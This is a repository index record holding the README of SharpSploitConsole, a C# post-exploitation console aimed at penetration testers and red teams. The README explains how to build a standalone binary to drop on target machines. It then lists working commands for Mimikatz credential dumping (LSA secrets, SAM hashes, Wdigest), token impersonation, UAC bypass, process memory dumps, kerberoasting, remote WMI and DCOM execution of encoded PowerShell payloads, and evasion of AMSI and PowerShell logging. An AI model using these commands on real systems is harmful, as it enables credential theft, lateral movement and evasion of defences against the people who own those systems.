{"id":13799617,"url":"https://github.com/anthemtotheego/SharpSploitConsole","last_synced_at":"2025-05-13T08:31:44.081Z","repository":{"id":114906504,"uuid":"151307265","full_name":"anthemtotheego/SharpSploitConsole","owner":"anthemtotheego","description":null,"archived":false,"fork":false,"pushed_at":"2022-02-21T15:12:26.000Z","size":4425,"stargazers_count":178,"open_issues_count":0,"forks_count":38,"subscribers_count":11,"default_branch":"master","last_synced_at":"2024-08-04T00:04:10.127Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/anthemtotheego.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null}},"created_at":"2018-10-02T18:57:46.000Z","updated_at":"2023-09-28T10:54:32.000Z","dependencies_parsed_at":null,"dependency_job_id":"660abd76-4aa9-4354-9fec-8a2dc7acdfde","html_url":"https://github.com/anthemtotheego/SharpSploitConsole","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/anthemtotheego%2FSharpSploitConsole","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/anthemtotheego%2FSharpSploitConsole/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/anthemtotheego%2FSharpSploitConsole/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/anthemtotheego%2FSharpSploitConsole/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/anthemtotheego","download_url":"https://codeload.github.com/anthemtotheego/SharpSploitConsole/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225190629,"owners_count":17435456,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T00:01:04.493Z","updated_at":"2024-11-18T14:30:45.384Z","avatar_url":"https://github.com/anthemtotheego.png","language":"C#","readme":"# SharpSploitConsole\n\nConsole Application designed to interact with SharpSploit released by @cobbr_io \u003e https://github.com/cobbr/SharpSploit\n\nSharpSploit is a tool written by @cobbr_io that combines many techniques/C# code from the infosec community and combines it into one sweet DLL.  It's awesome so check it out! \n\nDescription\n============\nSharpSploit Console is just a quick proof of concept binary to help penetration testers or red teams with less C# experience play with some of the awesomeness that is SharpSploit.  By following the instructions below you should be able to embed both the SharpSploit.dll and System.Management.Automation.dll into the SharpSploitConsole binary, creating a standalone exe you can drop on an appropriate target sytem and run over a non-interactive shell (such as beacon).  \n\nThis concept can be applied to many C# binaries.  For example, we could embed the System.Management.Automation.dll into our favorite C# NoPowershell.exe, creating a binary that doesn't rely on the System.Management.Automation.dll on the target system.\n\nLastly, I am aware there are probably thousands of ways to make this better, faster, cooler, stealthier etc. So please free to let me know....in a nice way. :)  I also plan to add more modules and improve others.\n\nContact at:\n- Twitter: @anthemtotheego or @g0ldengunsec\n\n**Before submitting issues, this tool may not always be updated actively. I encourage you to borrow, add, mod, and/or make your own.  Remember, all the awesome code out there (and there is a lot) can be taken/modified to create your own custom tools.**\n\n![Alt text](/sharpsploitimg1.PNG?raw=true \"SharpSploitConsole\")\n![Alt text](/sharpsploitimg2.PNG?raw=true \"\")\n\nSetup - Quick and Dirty\n==============================\n\n**Note: I used Windows 10, Visual Studio 2017 - mileage may vary**\n\n1. Download SharpSploit tool from https://github.com/cobbr/SharpSploit.git\n\n2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for correct architecture) - Should see drop down with Any    CPU \u003e Click on it and open Configuration Manager \u003e under platform change to desired architecture and select ok.\n\n3. Download SharpSploitConsole tool and open up SharpSploitConsole.sln\n\n4. Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into                        SharpSploitConsole/bin/x64/Debug folder\n\n5. Next we will set up visual studio to embed our DLL's into our exe so we can just have a single binary we can run on our target          machine. We will do this by doing the following:\n\n  In visual studio:\n\n   a. Tools \u003e NuGet Package Manager \u003e Package Manager Console\n \n   b. Inside console run:\n\n      Install-Package Costura.Fody\n  \n   c. Open up notepad and paste the following code below and save it with the name FodyWeavers.xml inside the SharpSploitConsole               directory that holds your bin, obj, properties folders.\n\n        \u003c?xml version=\"1.0\" encoding=\"utf-8\"?\u003e\n        \u003cWeavers\u003e\n          \u003cCostura /\u003e\n        \u003c/Weavers\u003e\n\n6. Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the                            SharpSploitConsole/bin/x64/Debug directory where we put our two DLL's, select them and add them.\n\n7. Compile, drop binary on target computer and have fun.\n\nExamples \n========\n\nNote:  All commands are case insensitive\n\nBy default all commands can be taken in as command line args, they will be executed and the program will exit (great for remote shells).  This looks something like the following: sharpSploitConsole.exe getSystem logonPasswords.  Alternatively, if you want to use the interactive console mode, you can use the interact command to get a pseudo-interactive shell.\n\nStart interactive console mode:\n\n```Interact```\n\nMimikatz all the things (does not run DCSync) - requires admin or system:\n\n```Mimi-All```\n\nRuns a specific Mimikatz command of your choice - requires admin or system:\n\n```Mimi-Command privilege::debug sekurlsa::logonPasswords```\n\nRuns the Mimikatz command privilege::debug sekurlsa::logonPasswords - requires admin or system:\n\n```logonPasswords```\n\nRuns the Mimikatz command to retrieve Domain Cached Credentials hashes from registry - requires admin or system:\n\n```LsaCache```\n\nRuns the Mimikatz command to retrieve LSA Secrets stored in registry - requires admin or system:\n\n```LsaSecrets```\n\nRetrieve password hashes from the SAM database - requires admin or system:\n\n```SamDump```\n\nRetrieve Wdigest credentials from registry - requires admin or system:\n\n```Wdigest```\n\nRetrieve current user:\n\n```whoami```\n\n```Username```\n\nImpersonate system user - requires admin rights:\n\n```GetSystem```\n\nImpersonate system user - Impersonate the token of a specified process, requires pid - command requires admin rights:\n\n```Impersonate 2918```\n\nBypass UAC - requires binary | command | path to binary - requires admin rights:\n\n```BypassUAC cmd.exe ipconfig C:\\Windows\\System32\\```\n\n```BypassUAC cmd.exe \"\" C:\\Windows\\System32\\```\n\nEnds the impersonation of any token, reverts back to initial token associated with current process:\n\n```RevertToSelf```\n\nRetrieve current working directory:\n\n```CurrentDirectory```\n\nRetrieve current directory listing:\n\n```DirectoryListing```\n\nChanges the current directory by appending a specified string to the current working directory:\n\n```ChangeDirectory SomeFolder```\n\nRetrieve hostname:\n\n```Hostname```\n\nRetrieve list of running processes:\n\n```ProcessList```\n\nCreates a minidump of the memory of a running process, requires PID | output location | output name - requires admin:\n\n```ProcDump 2198 C:\\Users\\Username\\Desktop memorydump.dmp```\n\nRetrieve registry path value, requires full path argument:\n\n```ReadRegistry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\COM3\\BuildNumber```\n\nWrite to registry, requires full path argument and value argument:\n\n```WriteRegistry HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\COM3\\RemoteAccessEnabled 1```\n\nRetrieve users of local group remotely, requires computername | groupname | username | password:\n\n```NetLocalGroupMembers computerName Administrators domain\\username P@55w0rd!```\n\n```NetLocalGroupMembers 192.168.1.20 Administrators .\\username P@55w0rd!```\n\nRetrieve local groups remotely, requires computername | username | password:\n\n```NetLocalGroups computerName domain\\username P@55w0rd!```\n\n```NetLocalGroups 192.168.1.20 .\\username P@55w0rd!```\n\nRetrieve current logged on users remotely, requires computername | username | password:\n\n```NetLoggedOnUsers computerName domain\\username P@55w0rd!```\n\n```NetLoggedOnUsers 192.168.1.20 .\\username P@55w0rd!```\n\nRetrieve user sessions remotely, requires computername | username | password:\n\n```NetSessions computerName domain\\username P@55w0rd!```\n\n```NetSessions 192.168.1.20 .\\username P@55w0rd!```\n\nPing systems, requires computernames:\n\n```Ping computer1 computer2 computer3 computer4```\n\nPort scan systems, requires computername | ports:\n\n```PortScan computer1 80 443 445 22 23```\n\nGet Domain Users, Grabs specified (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:\n\n```GetDomainUsers```\n\nGet Domain Groups, Grabs specified (or all) group objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:\n\n```GetDomainGroups```\n\n```GetDomainGroups -target \"Domain Admins\"```\n\nGet Domain Computers, Grabs specified (or all) computer objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target:\n\n```GetDomainComputers```\n\nPerform Kerberoasting, Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context. optional arguments: -username -password -domain -server -searchbase -searchstring -target\n\n```Kerberoast```\n\n```Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService```\n\nRun command remotely via WMI, requires computername | username | password | command - requires admin:\n\n```WMI computer1 domain\\username P@55w0rd! \u003centire powershell empire payload\u003e```\n\n```WMI computer1 .\\username P@55w0rd! powershell -noP -sta -w 1 -enc \u003cBase64\u003e```\n\nRun command remotely via DCOM, requires computername | command | directory | params - requires admin:\n\n```DCOM computer1 cmd.exe c:\\Windows\\System32 powershell -noP -sta -w 1 -enc \u003cBase64\u003e```\n\nRun shell command:\n\n```Shell ipconfig /all```\n\nRun powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging:\n\n```Powershell -noP -sta -w 1 -enc \u003cBase64\u003e```\n\n# Currently available options (more to come)                           \n    \n- **Interact**              : Starts interactive console mode, if you are interacting remotely you may not want to use this option   \n- **Mimi-All**              : Executes everything but DCSync, requires admin\n- **Mimi-Command**          : Executes a chosen Mimikatz command\n- **logonPasswords**        : Runs privilege::debug sekurlsa::logonPasswords\n- **LsaCache**              : Retrieve Domain Cached Credentials hashes from registry\n- **LsaSecrets**            : Retrieve LSA secrets stored in registry\n- **SamDump**               : Retrieve password hashes from the SAM database\n- **Wdigest**               : Retrieve Wdigest credentials from registry\n- **whoami**                : Retrieve current user \n- **GetSystem**             : Impersonate system user, requires admin rights\n- **Impersonate**           : Impersonate the token of a specified process, requires pid - command requires admin rights.\n- **BypassUAC**             : Bypass UAC, requires binary | command | path to binary - requires admin rights\n- **RevertToSelf**          : Ends the impersonation of any token, reverts back to initial token associated with current process\n- **CurrentDirectory**      : Retrieve current working directory\n- **DirectoryListing**      : Retrieve current directory listing\n- **ChangeDirectory**       : Changes the current directory by appending a specified string to the current working directory\n- **Hostname**              : Retrieve hostname\n- **ProcessList**           : Retrieve list of running processes\n- **ProcDump**              : Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin\n- **Username**              : Retrieve current username\n- **ReadRegistry**          : Retrieve registry path value, requires full path argument\n- **WriteRegistry**         : Write to registry, requires full path argument | value\n- **NetLocalGroupMembers**  : Retrieve users of local group remotely, requires computername | groupname | username | password\n- **NetLocalGroups**        : Retrieve local groups remotely, requires computername | username | password\n- **NetLoggedOnUsers**      : Retrieve current logged on users remotely, requires computername | username | password\n- **NetSessions**           : Retrieve user sessions remotely, requires computername | username | password\n- **Ping**                  : Ping systems, requires computernames\"\n- **PortScan**              : Port scan systems, requires computername | ports\n- **GetDomainUsers**        : Grabs specified (or all) user objects in the target domain, by default will use current user context\n- **GetDomainGroups**       : Grabs specified (or all) group objects in the target domain, by default will use current user context\n- **GetDomainComputers**    : Grabs specified (or all) computer objects in the target domain, by default will use current user context\n- **Kerberoast**        : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context\n- **WMI**                   : Run command remotely via WMI, requires computername | username | password | command | requires admin\n- **DCOM**                  : Run command remotely via DCOM, requires computername | command | directory | params - requires admin\n- **Shell**                 : Run a shell command\n- **Powershell**            : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging\n\n","funding_links":[],"categories":["[↑](#table-of-contents) Misc","Pentesting"],"sub_categories":["Post Exploitation Frameworks \u0026 Tools","ARM"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fanthemtotheego%2FSharpSploitConsole","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fanthemtotheego%2FSharpSploitConsole","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fanthemtotheego%2FSharpSploitConsole/lists"}